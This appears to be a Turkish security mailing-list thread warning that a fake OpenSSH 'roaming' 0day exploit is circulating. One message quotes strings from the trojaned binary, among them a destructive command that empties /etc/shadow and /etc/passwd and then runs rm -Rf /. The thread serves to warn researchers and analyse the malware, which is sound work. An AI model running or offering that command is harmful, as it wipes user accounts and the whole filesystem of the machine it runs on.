Bende o hataya dustum hocam shellcodeyi decode edince anladık işin aslını
dikkatli olunması gerek gerçekten. Oğuzhan Akkaya
Information Security ResearcherIns. Mail: [email protected]
Per.Mail: [email protected]
Web: www.oguzhanaakkaya.comLinkedIn | Twitter |
18 Ocak 2016 12:32 Pazartesi tarihinde Kayhan KAYIHAN
<[email protected]> şöyle yazdı:
https://dustri.org/b/how-to-radare2-a-fake-openssh-exploit.html
Belirtiğiniz konuyu yukarıdaki linkte de detaylı olarak işlemişler hocam,
incelemek isteyen arkadaşlar için paylaşıyorum.
18 Ocak 2016 10:31 tarihinde Tacettin Karadeniz <[email protected]> yazdı:
OpenSSH "ROAMING" zafiyeti husunda sahte exploit dolaşmaktadır.
Exploiti deneyim derken sıkıntı yaşamamak gerek.
Exploiti incelerken dikkatimi ceken hususlar aşağıda belirttim.echo "" >
/etc/shadow ; echo "" > /etc/passwd ; rm -Rf /
kısmına dikkat!!!
Target : openssh 4.7 to 7.1 roamingType : 0dayAuthor : You know meExec : %s
<server> <port>- Abort - Need ROOT to bind to raw socket!! + OK Starting..[ ]
Use IP and port (mandatory);*3$"Rfh-ch/shh/binecho "" > /etc/shadow ; echo "" >
/etc/passwd ; rm -Rf /GCC: (Debian 4.9.2-10) 4.9.2GCC: (Debian 4.8.4-1) 4.8.4
-------------------
DDOS Saldırıları ve Korunma Yolları Eğitimi
İstanbul: 27-28 Şubat 2016
Ankara: 03-04 Mart 2016
-------------------
-------------------
DDOS Saldırıları ve Korunma Yolları Eğitimi
İstanbul: 27-28 Şubat 2016
Ankara: 03-04 Mart 2016
-------------------
-------------------
DDOS Saldırıları ve Korunma Yolları Eğitimi
İstanbul: 27-28 Şubat 2016
Ankara: 03-04 Mart 2016
-------------------